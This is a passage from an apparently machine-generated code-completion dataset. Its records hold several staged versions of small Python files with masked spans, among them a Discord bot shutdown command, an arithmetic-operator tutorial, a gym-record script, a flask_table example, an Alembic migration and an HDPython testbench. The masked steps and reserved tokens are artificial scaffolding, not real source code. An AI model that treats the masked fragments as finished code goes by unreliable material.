"step-5": "from discord.ext import commands\n\n\ndef is_owner():\n async def predicate(ctx):\n return ctx.author.id == 98208218022428672\n\n return commands.check(predicate)\n\n\nclass Staff(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(\n name='stop',\n aliases=['shutdown'],\n description='This is a command for staff only to stop the bot'\n )\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send('Oh, alright... I\\'ll just shutup I guess.. :wave:')\n await self.bot.close()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(a)
<|reserved_special_token_0|>
print(b)
<|reserved_special_token_0|>
print(c)
print(19 - 1)
<|reserved_special_token_0|>
print(d)
<|reserved_special_token_0|>
print(e)
<|reserved_special_token_0|>
print(f)
<|reserved_special_token_0|>
print(g)
<|reserved_special_token_0|>
print(h)
<|reserved_special_token_1|>
a = 7 + 8
print(a)
b = 'GOOD' + 'Job'
print(b)
c = -7
print(c)
print(19 - 1)
d = 4 * 7
print(d)
e = 'hello' * 7
print(e)
f = 7 / 2
print(f)
g = 2 ** 3
print(g)
h = 3 < 7
print(h)
<|reserved_special_token_1|>
#python的运算符实例
#'+'加号
# 俩个对象相加(可以是俩个数字,也可以是俩个字符串(将俩个字符串连接))
a=7+8
print(a)
b="GOOD"+"Job"
print(b)
#'-'减号
#取一个数字的相反数或者实现俩个数字相减
c=-7
print(c)
print(19-1)
#'*'乘号
#如果是数字则进行乘法运算,字符串则复制若干次
d=4*7
print(d)
e="hello"*7
print(e)
#'/'除号
#表示俩个数字相除(Python 3.0中会直接输出正确的值)
f=7/2
print(f)
#'**'求幂运算
g=2**3
print(g)
#'<'小于号 返回一个布尔值
h=3<7
print(h)
|
flexible
|
{
"blob_id": "d28f5f95b375a1e075fdfcbc0350c90cf96f0212",
"index": 9694,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(a)\n<mask token>\nprint(b)\n<mask token>\nprint(c)\nprint(19 - 1)\n<mask token>\nprint(d)\n<mask token>\nprint(e)\n<mask token>\nprint(f)\n<mask token>\nprint(g)\n<mask token>\nprint(h)\n",
"step-3": "a = 7 + 8\nprint(a)\nb = 'GOOD' + 'Job'\nprint(b)\nc = -7\nprint(c)\nprint(19 - 1)\nd = 4 * 7\nprint(d)\ne = 'hello' * 7\nprint(e)\nf = 7 / 2\nprint(f)\ng = 2 ** 3\nprint(g)\nh = 3 < 7\nprint(h)\n",
"step-4": "#python的运算符实例\n#'+'加号\n# 俩个对象相加(可以是俩个数字,也可以是俩个字符串(将俩个字符串连接))\na=7+8\nprint(a)\nb=\"GOOD\"+\"Job\"\nprint(b)\n\n#'-'减号\n#取一个数字的相反数或者实现俩个数字相减\nc=-7\nprint(c)\nprint(19-1)\n\n#'*'乘号\n#如果是数字则进行乘法运算,字符串则复制若干次\nd=4*7\nprint(d)\ne=\"hello\"*7\nprint(e)\n\n#'/'除号\n#表示俩个数字相除(Python 3.0中会直接输出正确的值)\nf=7/2\nprint(f)\n\n#'**'求幂运算\ng=2**3\nprint(g)\n\n#'<'小于号 返回一个布尔值\nh=3<7\nprint(h)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def increment(number):
number += 1
return number
<|reserved_special_token_0|>
<|reserved_special_token_1|>
x = 10
def increment(number):
number += 1
return number
x = increment(x)
<|reserved_special_token_1|>
# x = 10
#
# def increment():
# x += 1
#
# ^^ Non-working code
x = 10
def increment(number):
number += 1
return number
# If we want to change a global variable,
# we have to do it like this
x = increment(x)
|
flexible
|
{
"blob_id": "a0460b100a750b685f3e831a19379b0e26da4b35",
"index": 7368,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef increment(number):\n number += 1\n return number\n\n\n<mask token>\n",
"step-3": "x = 10\n\n\ndef increment(number):\n number += 1\n return number\n\n\nx = increment(x)\n",
"step-4": "# x = 10\n#\n# def increment():\n# x += 1\n# \n# ^^ Non-working code\n\nx = 10\n\ndef increment(number): \n number += 1\n return number\n\n# If we want to change a global variable,\n# we have to do it like this\nx = increment(x)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while True:
print(
""" Welcome to HMS
1. Are you want enter data
2. Are you want see record
3. exit
"""
)
option = int(input('enter your option'))
print(option)
if option == 1:
print(
""" Select client name
1. Add Exercise
2. Add Dite
4. exit
"""
)
option1 = int(input('enter your option'))
if option1 == 1:
print(
""" 1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option2 = int(input('enter your option'))
option2 = option2 - 1
name = list[option2]
dec = input('enter the exercise name')
f = open(name, 'a')
decs = dec + '--' + str(a) + '\n'
f.write(decs)
f.close()
print('successfuly data enter')
elif option1 == 2:
print(
""" 1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option2 = int(input('enter your option'))
option2 = option2 - 1
name = list[option2]
dec = input('enter the dite')
f = open(name, 'a')
decs = dec + '--' + str(a) + '\n'
f.write(decs)
f.close()
print('successfuly data enter')
else:
break
elif option == 2:
print(
""" select name whose record you want see
1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option3 = int(input('enter your option'))
option3 = option3 - 1
name = list[option3]
f = open(name, 'rt')
content = f.read()
print(content)
else:
break
<|reserved_special_token_1|>
<|reserved_special_token_0|>
a = datetime.datetime.now()
while True:
print(
""" Welcome to HMS
1. Are you want enter data
2. Are you want see record
3. exit
"""
)
option = int(input('enter your option'))
print(option)
if option == 1:
print(
""" Select client name
1. Add Exercise
2. Add Dite
4. exit
"""
)
option1 = int(input('enter your option'))
if option1 == 1:
print(
""" 1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option2 = int(input('enter your option'))
option2 = option2 - 1
name = list[option2]
dec = input('enter the exercise name')
f = open(name, 'a')
decs = dec + '--' + str(a) + '\n'
f.write(decs)
f.close()
print('successfuly data enter')
elif option1 == 2:
print(
""" 1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option2 = int(input('enter your option'))
option2 = option2 - 1
name = list[option2]
dec = input('enter the dite')
f = open(name, 'a')
decs = dec + '--' + str(a) + '\n'
f.write(decs)
f.close()
print('successfuly data enter')
else:
break
elif option == 2:
print(
""" select name whose record you want see
1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option3 = int(input('enter your option'))
option3 = option3 - 1
name = list[option3]
f = open(name, 'rt')
content = f.read()
print(content)
else:
break
<|reserved_special_token_1|>
import datetime
a = datetime.datetime.now()
while True:
print(
""" Welcome to HMS
1. Are you want enter data
2. Are you want see record
3. exit
"""
)
option = int(input('enter your option'))
print(option)
if option == 1:
print(
""" Select client name
1. Add Exercise
2. Add Dite
4. exit
"""
)
option1 = int(input('enter your option'))
if option1 == 1:
print(
""" 1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option2 = int(input('enter your option'))
option2 = option2 - 1
name = list[option2]
dec = input('enter the exercise name')
f = open(name, 'a')
decs = dec + '--' + str(a) + '\n'
f.write(decs)
f.close()
print('successfuly data enter')
elif option1 == 2:
print(
""" 1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option2 = int(input('enter your option'))
option2 = option2 - 1
name = list[option2]
dec = input('enter the dite')
f = open(name, 'a')
decs = dec + '--' + str(a) + '\n'
f.write(decs)
f.close()
print('successfuly data enter')
else:
break
elif option == 2:
print(
""" select name whose record you want see
1. Aditya
2. harsh
3. shivam
4. exit
"""
)
list = ['Aditya', 'harsh', 'shivam']
option3 = int(input('enter your option'))
option3 = option3 - 1
name = list[option3]
f = open(name, 'rt')
content = f.read()
print(content)
else:
break
<|reserved_special_token_1|>
import datetime
a = datetime.datetime.now()
while True:
print("""\
Welcome to HMS
1. Are you want enter data
2. Are you want see record
3. exit
""")
option = int(input("enter your option"))
print(option)
if option == 1:
print("""\
Select client name
1. Add Exercise
2. Add Dite
4. exit
""")
option1 =int(input("enter your option"))
if option1 == 1:
print("""\
1. Aditya
2. harsh
3. shivam
4. exit
""")
list=['Aditya', 'harsh','shivam']
option2 =int(input("enter your option"))
option2 = option2-1
name = list[option2]
dec = input("enter the exercise name")
f = open(name,"a")
decs = dec+'--'+str(a)+'\n'
f.write(decs)
f.close()
print('successfuly data enter')
elif option1 == 2:
print("""\
1. Aditya
2. harsh
3. shivam
4. exit
""")
list=['Aditya', 'harsh','shivam']
option2 =int(input("enter your option"))
option2 = option2-1
name = list[option2]
dec = input("enter the dite")
f = open(name,"a")
decs = dec+'--'+str(a)+'\n'
f.write(decs)
f.close()
print('successfuly data enter')
else:
break
elif option == 2:
print("""\
select name whose record you want see
1. Aditya
2. harsh
3. shivam
4. exit
""")
list=['Aditya', 'harsh','shivam']
option3 =int(input("enter your option"))
option3 = option3-1
name = list[option3]
f = open(name,"rt")
content =f.read()
print(content)
else:
break
|
flexible
|
{
"blob_id": "5c5a0fd67a6d6e805b77ddfddfe959335daa3bad",
"index": 6383,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n print(\n \"\"\" Welcome to HMS\n 1. Are you want enter data\n 2. Are you want see record\n 3. exit\n \"\"\"\n )\n option = int(input('enter your option'))\n print(option)\n if option == 1:\n print(\n \"\"\" Select client name\n 1. Add Exercise\n 2. Add Dite\n 4. exit\n \"\"\"\n )\n option1 = int(input('enter your option'))\n if option1 == 1:\n print(\n \"\"\" 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option2 = int(input('enter your option'))\n option2 = option2 - 1\n name = list[option2]\n dec = input('enter the exercise name')\n f = open(name, 'a')\n decs = dec + '--' + str(a) + '\\n'\n f.write(decs)\n f.close()\n print('successfuly data enter')\n elif option1 == 2:\n print(\n \"\"\" 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option2 = int(input('enter your option'))\n option2 = option2 - 1\n name = list[option2]\n dec = input('enter the dite')\n f = open(name, 'a')\n decs = dec + '--' + str(a) + '\\n'\n f.write(decs)\n f.close()\n print('successfuly data enter')\n else:\n break\n elif option == 2:\n print(\n \"\"\" select name whose record you want see\n 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option3 = int(input('enter your option'))\n option3 = option3 - 1\n name = list[option3]\n f = open(name, 'rt')\n content = f.read()\n print(content)\n else:\n break\n",
"step-3": "<mask token>\na = datetime.datetime.now()\nwhile True:\n print(\n \"\"\" Welcome to HMS\n 1. Are you want enter data\n 2. Are you want see record\n 3. exit\n \"\"\"\n )\n option = int(input('enter your option'))\n print(option)\n if option == 1:\n print(\n \"\"\" Select client name\n 1. Add Exercise\n 2. Add Dite\n 4. exit\n \"\"\"\n )\n option1 = int(input('enter your option'))\n if option1 == 1:\n print(\n \"\"\" 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option2 = int(input('enter your option'))\n option2 = option2 - 1\n name = list[option2]\n dec = input('enter the exercise name')\n f = open(name, 'a')\n decs = dec + '--' + str(a) + '\\n'\n f.write(decs)\n f.close()\n print('successfuly data enter')\n elif option1 == 2:\n print(\n \"\"\" 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option2 = int(input('enter your option'))\n option2 = option2 - 1\n name = list[option2]\n dec = input('enter the dite')\n f = open(name, 'a')\n decs = dec + '--' + str(a) + '\\n'\n f.write(decs)\n f.close()\n print('successfuly data enter')\n else:\n break\n elif option == 2:\n print(\n \"\"\" select name whose record you want see\n 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option3 = int(input('enter your option'))\n option3 = option3 - 1\n name = list[option3]\n f = open(name, 'rt')\n content = f.read()\n print(content)\n else:\n break\n",
"step-4": "import datetime\na = datetime.datetime.now()\nwhile True:\n print(\n \"\"\" Welcome to HMS\n 1. Are you want enter data\n 2. Are you want see record\n 3. exit\n \"\"\"\n )\n option = int(input('enter your option'))\n print(option)\n if option == 1:\n print(\n \"\"\" Select client name\n 1. Add Exercise\n 2. Add Dite\n 4. exit\n \"\"\"\n )\n option1 = int(input('enter your option'))\n if option1 == 1:\n print(\n \"\"\" 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option2 = int(input('enter your option'))\n option2 = option2 - 1\n name = list[option2]\n dec = input('enter the exercise name')\n f = open(name, 'a')\n decs = dec + '--' + str(a) + '\\n'\n f.write(decs)\n f.close()\n print('successfuly data enter')\n elif option1 == 2:\n print(\n \"\"\" 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option2 = int(input('enter your option'))\n option2 = option2 - 1\n name = list[option2]\n dec = input('enter the dite')\n f = open(name, 'a')\n decs = dec + '--' + str(a) + '\\n'\n f.write(decs)\n f.close()\n print('successfuly data enter')\n else:\n break\n elif option == 2:\n print(\n \"\"\" select name whose record you want see\n 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\"\n )\n list = ['Aditya', 'harsh', 'shivam']\n option3 = int(input('enter your option'))\n option3 = option3 - 1\n name = list[option3]\n f = open(name, 'rt')\n content = f.read()\n print(content)\n else:\n break\n",
"step-5": "import datetime\na = datetime.datetime.now()\nwhile True:\n print(\"\"\"\\\n Welcome to HMS\n 1. Are you want enter data\n 2. Are you want see record\n 3. exit\n \"\"\")\n option = int(input(\"enter your option\"))\n print(option)\n if option == 1:\n\n print(\"\"\"\\\n Select client name\n 1. Add Exercise\n 2. Add Dite\n 4. exit\n \"\"\")\n option1 =int(input(\"enter your option\"))\n if option1 == 1:\n print(\"\"\"\\\n 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\")\n list=['Aditya', 'harsh','shivam']\n option2 =int(input(\"enter your option\"))\n option2 = option2-1\n name = list[option2]\n dec = input(\"enter the exercise name\")\n f = open(name,\"a\")\n decs = dec+'--'+str(a)+'\\n'\n f.write(decs)\n f.close()\n print('successfuly data enter')\n elif option1 == 2:\n print(\"\"\"\\\n 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\")\n list=['Aditya', 'harsh','shivam']\n option2 =int(input(\"enter your option\"))\n option2 = option2-1\n name = list[option2]\n dec = input(\"enter the dite\")\n f = open(name,\"a\")\n decs = dec+'--'+str(a)+'\\n'\n f.write(decs)\n f.close()\n print('successfuly data enter') \n else:\n break \n elif option == 2:\n print(\"\"\"\\\n select name whose record you want see\n 1. Aditya\n 2. harsh\n 3. shivam\n 4. exit\n \"\"\")\n list=['Aditya', 'harsh','shivam']\n option3 =int(input(\"enter your option\"))\n option3 = option3-1\n name = list[option3]\n f = open(name,\"rt\")\n content =f.read() \n print(content) \n else:\n break\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from flask_table import Table, Col
"""Lets suppose that we have a class that we get an iterable of from
somewhere, such as a database. We can declare a table that pulls out
the relevant entries, escapes them and displays them.
"""
class Item(object):
def __init__(self, name, category):
self.name = name
self.category = category
class Category(object):
def __init__(self, name):
self.name = name
class ItemTable(Table):
name = Col('Name')
category_name = Col('Category', attr_list=['category', 'name'])
# Equivalently: Col('Category', attr='category.name')
# Both syntaxes are kept as the second is more readable, but
# doesn't cover all options. Such as if the items are dicts and
# the keys have dots in.
def main():
items = [Item('A', Category('catA')),
Item('B', Category('catB'))]
tab = ItemTable(items)
print(tab.__html__())
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "3191fa5f9c50993d17e12e4e2e9d56cfce2108e7",
"index": 5646,
"step-1": "<mask token>\n\n\nclass Item(object):\n\n def __init__(self, name, category):\n self.name = name\n self.category = category\n\n\nclass Category(object):\n\n def __init__(self, name):\n self.name = name\n\n\nclass ItemTable(Table):\n name = Col('Name')\n category_name = Col('Category', attr_list=['category', 'name'])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Item(object):\n\n def __init__(self, name, category):\n self.name = name\n self.category = category\n\n\nclass Category(object):\n\n def __init__(self, name):\n self.name = name\n\n\nclass ItemTable(Table):\n name = Col('Name')\n category_name = Col('Category', attr_list=['category', 'name'])\n\n\ndef main():\n items = [Item('A', Category('catA')), Item('B', Category('catB'))]\n tab = ItemTable(items)\n print(tab.__html__())\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Item(object):\n\n def __init__(self, name, category):\n self.name = name\n self.category = category\n\n\nclass Category(object):\n\n def __init__(self, name):\n self.name = name\n\n\nclass ItemTable(Table):\n name = Col('Name')\n category_name = Col('Category', attr_list=['category', 'name'])\n\n\ndef main():\n items = [Item('A', Category('catA')), Item('B', Category('catB'))]\n tab = ItemTable(items)\n print(tab.__html__())\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from flask_table import Table, Col\n<mask token>\n\n\nclass Item(object):\n\n def __init__(self, name, category):\n self.name = name\n self.category = category\n\n\nclass Category(object):\n\n def __init__(self, name):\n self.name = name\n\n\nclass ItemTable(Table):\n name = Col('Name')\n category_name = Col('Category', attr_list=['category', 'name'])\n\n\ndef main():\n items = [Item('A', Category('catA')), Item('B', Category('catB'))]\n tab = ItemTable(items)\n print(tab.__html__())\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from flask_table import Table, Col\n\n\n\"\"\"Lets suppose that we have a class that we get an iterable of from\nsomewhere, such as a database. We can declare a table that pulls out\nthe relevant entries, escapes them and displays them.\n\n\"\"\"\n\n\nclass Item(object):\n def __init__(self, name, category):\n self.name = name\n self.category = category\n\n\nclass Category(object):\n def __init__(self, name):\n self.name = name\n\n\nclass ItemTable(Table):\n name = Col('Name')\n category_name = Col('Category', attr_list=['category', 'name'])\n # Equivalently: Col('Category', attr='category.name')\n # Both syntaxes are kept as the second is more readable, but\n # doesn't cover all options. Such as if the items are dicts and\n # the keys have dots in.\n\n\ndef main():\n items = [Item('A', Category('catA')),\n Item('B', Category('catB'))]\n\n tab = ItemTable(items)\n print(tab.__html__())\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
6,
7,
8,
9,
10
]
}
|
[
6,
7,
8,
9,
10
] |
#-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: Nirvana
#
# Created: 07/06/2014
# Copyright: (c) Nirvana 2014
# Licence: <your licence>
#-------------------------------------------------------------------------------
import random
class Coin(object):
def __init__(self):
self.sideup = "Heads"
def toss(self):
if random.randint(0,1)==0:
self.sideup = "Heads"
else:
self.sideup = "Tails"
def get_sideup(self):
return self.sideup
mycoin=Coin()
print (mycoin.sideup)
print (mycoin.get_sideup())
mycoin.toss()
print (mycoin.get_sideup())
|
normal
|
{
"blob_id": "eb246beb05249f5dfde019b773698ba3bb1b1118",
"index": 544,
"step-1": "<mask token>\n\n\nclass Coin(object):\n\n def __init__(self):\n self.sideup = 'Heads'\n\n def toss(self):\n if random.randint(0, 1) == 0:\n self.sideup = 'Heads'\n else:\n self.sideup = 'Tails'\n\n def get_sideup(self):\n return self.sideup\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Coin(object):\n\n def __init__(self):\n self.sideup = 'Heads'\n\n def toss(self):\n if random.randint(0, 1) == 0:\n self.sideup = 'Heads'\n else:\n self.sideup = 'Tails'\n\n def get_sideup(self):\n return self.sideup\n\n\n<mask token>\nprint(mycoin.sideup)\nprint(mycoin.get_sideup())\nmycoin.toss()\nprint(mycoin.get_sideup())\n",
"step-3": "<mask token>\n\n\nclass Coin(object):\n\n def __init__(self):\n self.sideup = 'Heads'\n\n def toss(self):\n if random.randint(0, 1) == 0:\n self.sideup = 'Heads'\n else:\n self.sideup = 'Tails'\n\n def get_sideup(self):\n return self.sideup\n\n\nmycoin = Coin()\nprint(mycoin.sideup)\nprint(mycoin.get_sideup())\nmycoin.toss()\nprint(mycoin.get_sideup())\n",
"step-4": "import random\n\n\nclass Coin(object):\n\n def __init__(self):\n self.sideup = 'Heads'\n\n def toss(self):\n if random.randint(0, 1) == 0:\n self.sideup = 'Heads'\n else:\n self.sideup = 'Tails'\n\n def get_sideup(self):\n return self.sideup\n\n\nmycoin = Coin()\nprint(mycoin.sideup)\nprint(mycoin.get_sideup())\nmycoin.toss()\nprint(mycoin.get_sideup())\n",
"step-5": "#-------------------------------------------------------------------------------\n# Name: module1\n# Purpose:\n#\n# Author: Nirvana\n#\n# Created: 07/06/2014\n# Copyright: (c) Nirvana 2014\n# Licence: <your licence>\n#-------------------------------------------------------------------------------\n\nimport random\n\nclass Coin(object):\n def __init__(self):\n self.sideup = \"Heads\"\n\n def toss(self):\n if random.randint(0,1)==0:\n self.sideup = \"Heads\"\n else:\n self.sideup = \"Tails\"\n\n def get_sideup(self):\n return self.sideup\n\nmycoin=Coin()\nprint (mycoin.sideup)\nprint (mycoin.get_sideup())\nmycoin.toss()\nprint (mycoin.get_sideup())\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
"""Changed Views table name
Revision ID: 7f559bb24ca4
Revises: cc927fe47c8f
Create Date: 2021-08-20 23:20:31.959984
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "7f559bb24ca4"
down_revision = "cc927fe47c8f"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"views",
sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
sa.Column("url_id", sa.String(length=31), nullable=True),
sa.ForeignKeyConstraint(
["url_id"],
["urls.id"],
),
sa.PrimaryKeyConstraint("id"),
)
op.drop_table("view")
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"view",
sa.Column("id", sa.INTEGER(), nullable=False),
sa.Column("url_id", sa.VARCHAR(length=31), nullable=True),
sa.ForeignKeyConstraint(
["url_id"],
["urls.id"],
),
sa.PrimaryKeyConstraint("id"),
)
op.drop_table("views")
# ### end Alembic commands ###
|
normal
|
{
"blob_id": "fd2b60de2ef540264855f04e1c5bcb9d1cf23c51",
"index": 9561,
"step-1": "<mask token>\n\n\ndef upgrade():\n op.create_table('views', sa.Column('id', sa.Integer(), autoincrement=\n True, nullable=False), sa.Column('url_id', sa.String(length=31),\n nullable=True), sa.ForeignKeyConstraint(['url_id'], ['urls.id']),\n sa.PrimaryKeyConstraint('id'))\n op.drop_table('view')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef upgrade():\n op.create_table('views', sa.Column('id', sa.Integer(), autoincrement=\n True, nullable=False), sa.Column('url_id', sa.String(length=31),\n nullable=True), sa.ForeignKeyConstraint(['url_id'], ['urls.id']),\n sa.PrimaryKeyConstraint('id'))\n op.drop_table('view')\n\n\ndef downgrade():\n op.create_table('view', sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('url_id', sa.VARCHAR(length=31), nullable=True), sa.\n ForeignKeyConstraint(['url_id'], ['urls.id']), sa.\n PrimaryKeyConstraint('id'))\n op.drop_table('views')\n",
"step-3": "<mask token>\nrevision = '7f559bb24ca4'\ndown_revision = 'cc927fe47c8f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table('views', sa.Column('id', sa.Integer(), autoincrement=\n True, nullable=False), sa.Column('url_id', sa.String(length=31),\n nullable=True), sa.ForeignKeyConstraint(['url_id'], ['urls.id']),\n sa.PrimaryKeyConstraint('id'))\n op.drop_table('view')\n\n\ndef downgrade():\n op.create_table('view', sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('url_id', sa.VARCHAR(length=31), nullable=True), sa.\n ForeignKeyConstraint(['url_id'], ['urls.id']), sa.\n PrimaryKeyConstraint('id'))\n op.drop_table('views')\n",
"step-4": "<mask token>\nimport sqlalchemy as sa\nfrom alembic import op\nrevision = '7f559bb24ca4'\ndown_revision = 'cc927fe47c8f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table('views', sa.Column('id', sa.Integer(), autoincrement=\n True, nullable=False), sa.Column('url_id', sa.String(length=31),\n nullable=True), sa.ForeignKeyConstraint(['url_id'], ['urls.id']),\n sa.PrimaryKeyConstraint('id'))\n op.drop_table('view')\n\n\ndef downgrade():\n op.create_table('view', sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('url_id', sa.VARCHAR(length=31), nullable=True), sa.\n ForeignKeyConstraint(['url_id'], ['urls.id']), sa.\n PrimaryKeyConstraint('id'))\n op.drop_table('views')\n",
"step-5": "\"\"\"Changed Views table name\n\nRevision ID: 7f559bb24ca4\nRevises: cc927fe47c8f\nCreate Date: 2021-08-20 23:20:31.959984\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"7f559bb24ca4\"\ndown_revision = \"cc927fe47c8f\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"views\",\n sa.Column(\"id\", sa.Integer(), autoincrement=True, nullable=False),\n sa.Column(\"url_id\", sa.String(length=31), nullable=True),\n sa.ForeignKeyConstraint(\n [\"url_id\"],\n [\"urls.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.drop_table(\"view\")\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"view\",\n sa.Column(\"id\", sa.INTEGER(), nullable=False),\n sa.Column(\"url_id\", sa.VARCHAR(length=31), nullable=True),\n sa.ForeignKeyConstraint(\n [\"url_id\"],\n [\"urls.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.drop_table(\"views\")\n # ### end Alembic commands ###\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from HDPython import *
import HDPython.examples as ahe
from enum import Enum, auto
class counter_state(Enum):
idle = auto()
running = auto()
done = auto()
class Counter_cl(v_class_master):
def __init__(self):
super().__init__()
self.counter = v_variable(v_slv(32))
self.counter_max = v_variable(v_slv(32))
self.state = v_variable(v_enum(counter_state.idle))
def _onPull(self):
if self.state == counter_state.running:
self.counter << self.counter + 1
def count_to_max(self, maxValue):
if self.state == counter_state.idle:
self.counter << 0
self.counter_max << maxValue
self.state << counter_state.running
def isDone(self):
return self.state == counter_state.done
def reset(self):
if self.state == counter_state.done:
self.state << counter_state.idle
class my_first_test_bench(v_entity):
def __init__(self):
super().__init__()
self.architecture()
@architecture
def architecture(self):
counter = v_variable(v_slv(32))
max_cnt = v_variable(v_slv(32,300))
clkgen = v_create(ahe.clk_generator())
cnt = Counter_cl()
@rising_edge(clkgen.clk)
def proc():
counter << counter + 1
cnt.count_to_max(max_cnt)
if cnt.isDone():
cnt.reset()
end_architecture()
my_first_instance = v_create(my_first_test_bench())
convert_to_hdl(my_first_instance, "myFirst")
|
normal
|
{
"blob_id": "046db03b146ce0182ba7889908f536a09de051d5",
"index": 5069,
"step-1": "<mask token>\n\n\nclass Counter_cl(v_class_master):\n\n def __init__(self):\n super().__init__()\n self.counter = v_variable(v_slv(32))\n self.counter_max = v_variable(v_slv(32))\n self.state = v_variable(v_enum(counter_state.idle))\n\n def _onPull(self):\n if self.state == counter_state.running:\n self.counter << self.counter + 1\n <mask token>\n\n def isDone(self):\n return self.state == counter_state.done\n <mask token>\n\n\nclass my_first_test_bench(v_entity):\n\n def __init__(self):\n super().__init__()\n self.architecture()\n\n @architecture\n def architecture(self):\n counter = v_variable(v_slv(32))\n max_cnt = v_variable(v_slv(32, 300))\n clkgen = v_create(ahe.clk_generator())\n cnt = Counter_cl()\n\n @rising_edge(clkgen.clk)\n def proc():\n counter << counter + 1\n cnt.count_to_max(max_cnt)\n if cnt.isDone():\n cnt.reset()\n end_architecture()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Counter_cl(v_class_master):\n\n def __init__(self):\n super().__init__()\n self.counter = v_variable(v_slv(32))\n self.counter_max = v_variable(v_slv(32))\n self.state = v_variable(v_enum(counter_state.idle))\n\n def _onPull(self):\n if self.state == counter_state.running:\n self.counter << self.counter + 1\n <mask token>\n\n def isDone(self):\n return self.state == counter_state.done\n\n def reset(self):\n if self.state == counter_state.done:\n self.state << counter_state.idle\n\n\nclass my_first_test_bench(v_entity):\n\n def __init__(self):\n super().__init__()\n self.architecture()\n\n @architecture\n def architecture(self):\n counter = v_variable(v_slv(32))\n max_cnt = v_variable(v_slv(32, 300))\n clkgen = v_create(ahe.clk_generator())\n cnt = Counter_cl()\n\n @rising_edge(clkgen.clk)\n def proc():\n counter << counter + 1\n cnt.count_to_max(max_cnt)\n if cnt.isDone():\n cnt.reset()\n end_architecture()\n\n\n<mask token>\n",
